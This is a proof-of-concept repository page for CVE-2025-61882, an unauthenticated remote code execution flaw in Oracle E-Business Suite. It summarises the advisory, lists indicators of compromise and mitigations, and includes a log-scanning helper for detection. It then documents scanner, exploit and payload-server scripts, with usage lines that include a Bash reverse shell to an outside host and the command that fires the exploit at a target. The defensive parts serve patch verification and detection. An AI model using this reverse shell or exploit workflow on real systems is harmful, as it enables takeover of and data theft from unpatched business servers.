
CVE-2025-61882 PoC — Oracle E-Business Suite Security Vulnerability

Source

Associated Vulnerability

Title: Oracle E-Business Suite Security Vulnerability (CVE-2025-61882)
Description: Vulnerability in the Oracle Concurrent Processing product of Oracle E-Business Suite (component: BI Publisher Integration). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Concurrent Processing. Successful attacks of this vulnerability can result in takeover of Oracle Concurrent Processing. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Description
CVE-2025-61882: Oracle E-Business Suite RCE Scanner and Exploit

Readme
# CVE-2025-61882 Scan/Exploit

## ⚠️ Legal Disclaimer

> **Legal & Ethical Notice**
>
> The tools and examples in this repository are intended **only** for authorized security testing, defensive research, and patch verification on systems you own or where you have explicit written permission to test. Running scanning or exploitation tools against systems without permission is illegal, unethical, and may cause service disruption or data loss. The repository authors and maintainers accept **no responsibility** for misuse. By using anything in this repository you confirm you have the necessary authorization and will comply with applicable law.

---

## 📖 About CVE-2025-61882

- **Affected Product(s):** Oracle E-Business Suite (EBS) — BI Publisher / Template processing components (reported in impacted 12.2.x series).
- **Vulnerability Type:** Server-side template / XML/XSLT injection leading to unauthenticated remote code execution (RCE) when malicious templates are processed.
- **Attack Vector:** Network (HTTP/S) — exploit can be triggered remotely.
- **Authentication Required:** **No** (pre-auth exploitation reported).
- **User Interaction Required:** **No**.
- **Impact:** Remote code execution, full compromise of the affected EBS process, potential lateral movement, data theft and persistence mechanisms.
- **Patch Status:** Oracle released an emergency patch and advisory (organizations should apply Oracle's provided update/mitigation immediately). Always verify patch details against Oracle's official advisory for your specific EBS version.

> **Note:** The above is a concise summary intended for README usage. For operational decisions consult Oracle’s official advisory, trusted vendor writeups, and your internal risk assessment.

### 🔐 CVSS v3.1 Base Score

- **Score**: 9.8 (**Critical**)  
- **Vector**: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`

---

## Indicators of Compromise (IOCs) & Observed Behaviour

- Suspicious HTTP requests to EBS endpoints (examples to monitor):
  - `/OA_HTML/configurator/UiServlet`
  - Template preview endpoints or pages that accept XSLT/XML template uploads
- Evidence of spawned shell/child processes from Java processes or anomalous Java classes loaded at runtime

---

## Mitigation & Defensive Recommendations

1. **Apply official patches** from Oracle immediately for affected EBS versions.
2. **Isolate/segment** EBS servers — restrict inbound access and restrict egress to only required destinations.
3. **Hunt** for malicious templates and suspicious entries in EBS template storage and database LOBs.
4. **Monitor** logs and HTTP access to template upload/preview endpoints and alert on unusual parameters or large POST payloads.
5. **Block or carefully filter** requests to administrative/templates endpoints at perimeter WAFs with strict rules.
6. **Collect forensic artifacts** (memory, process lists, DB snapshots) before patching if you suspect active compromise.
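A log-triage helper for the IOC endpoint and the monitoring items above (POSTs to the template endpoint, unusual parameters, automated clients), added here as an example and not code from the PoC repository. It assumes an Apache/NCSA combined-format access log; the sample lines and the `tmpl` parameter name are constructed.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Apache/NCSA combined log format; field names follow the standard layout.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Endpoint from the IOC list above; add your own template upload/preview paths here.
WATCHED_PATHS = ("/OA_HTML/configurator/UiServlet",)
# exploit.py makes the target fetch an externally hosted XSL payload, so a decoded
# query string that points at a URL or a stylesheet is worth an alert on its own.
SUSPICIOUS_QUERY_RE = re.compile(r"(https?://|\.xslt?\b|<\?xml|<xsl:)", re.IGNORECASE)
AUTOMATED_UA_RE = re.compile(r"(python-requests|curl/|go-http-client|libwww)", re.IGNORECASE)


def analyse_line(line: str) -> Optional[Dict]:
    """Return a finding for a request to a watched endpoint, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None  # unparseable line: skipped, not treated as a hit
    path, _, query = m["path"].partition("?")
    if not any(path.startswith(p) for p in WATCHED_PATHS):
        return None
    reasons = []
    if m["method"] == "POST":
        reasons.append("POST to template endpoint")
    if query and SUSPICIOUS_QUERY_RE.search(unquote(query)):
        reasons.append("query references external/XSL content")
    if AUTOMATED_UA_RE.search(m["ua"]):
        reasons.append("automated client user-agent")
    severity = "high" if len(reasons) >= 2 else "medium" if reasons else "low"
    return {"ip": m["ip"], "ts": m["ts"], "method": m["method"], "path": path,
            "status": int(m["status"]), "severity": severity, "reasons": reasons}


def scan_log(text: str) -> List[Dict]:
    """Run analyse_line over every line of an access log and keep the findings."""
    return [f for f in (analyse_line(l) for l in text.splitlines()) if f]


# Constructed sample access log (not real traffic); 'tmpl' is a made-up parameter name.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Oct/2025:10:01:12 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [06/Oct/2025:10:01:15 +0000] "POST /OA_HTML/configurator/UiServlet HTTP/1.1" 200 843 "-" "python-requests/2.31"
198.51.100.4 - - [06/Oct/2025:10:02:01 +0000] "GET /OA_HTML/configurator/UiServlet?tmpl=http%3A%2F%2F203.0.113.50%2Fp.xsl HTTP/1.1" 200 110 "-" "Mozilla/5.0"
198.51.100.8 - - [06/Oct/2025:10:02:30 +0000] "GET /OA_HTML/configurator/UiServlet HTTP/1.1" 200 110 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"].upper(), f["ip"], f["method"], f["path"], f["reasons"])
```

Access logs do not record request bodies, so a POST with a payload in the body only surfaces here as the "POST to template endpoint" reason; pair this with request-body logging or WAF telemetry where available.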

---

## Repository Structure

```
.
├── README.md                # <-- this file
├── scan.py
├── exploit.py
├── server.py
```

---

## Usage — tools in this repo

**Important:** Only run these tools in a lab or on systems for which you have explicit authorization.

This repository contains three Python scripts (tooling is intentionally minimal and intended for test-lab verification):

- `scan.py` — scanning utility to probe a host for the presence of the vulnerable endpoint(s).
- `exploit.py` — exploitation helper script to interact with a target and trigger template processing.
- `server.py` — simple HTTP server to host an XSL/XSLT payload that the `exploit.py` script references when testing.

### `scan.py` — Example usage

Purpose: non-destructive checks for exposed EBS endpoints and quick fingerprinting.

**Example:**

```bash
python3 scan.py target_url webhook
python3 scan.py http://apps.example.com:8000/ example.requestrepo.com
```

### `server.py` — Example usage

Purpose: host an XSL(XSLT) payload for controlled tests so `exploit.py` can reference it.

**Example:**

```bash
python3 server.py server_port target_system command
python3 server.py 80 linux 'bash -i >& /dev/tcp/8.8.8.8/4444 0>&1'
python3 server.py 80 windows 'calc'
```

### `exploit.py` — Example usage

Purpose: demonstration / testing harness that triggers template processing on a target by referencing an externally hosted XSL payload.

**Example:**

```bash
python3 exploit.py target_url config_server_host_port
python3 exploit.py http://apps.example.com:8000/ 8.8.8.8:80
```

Notes:
- **Do not** run `exploit.py` against production systems or any system without explicit authorization.

---

File Snapshot

[4.0K] /data/pocs/8996aec5993bda5a768dd5400e4609517786e264
├── [3.9K] exploit.py
├── [4.7K] README.md
├── [  25] requirements.txt
├── [3.1K] scan.py
└── [2.5K] server.py

1 directory, 5 files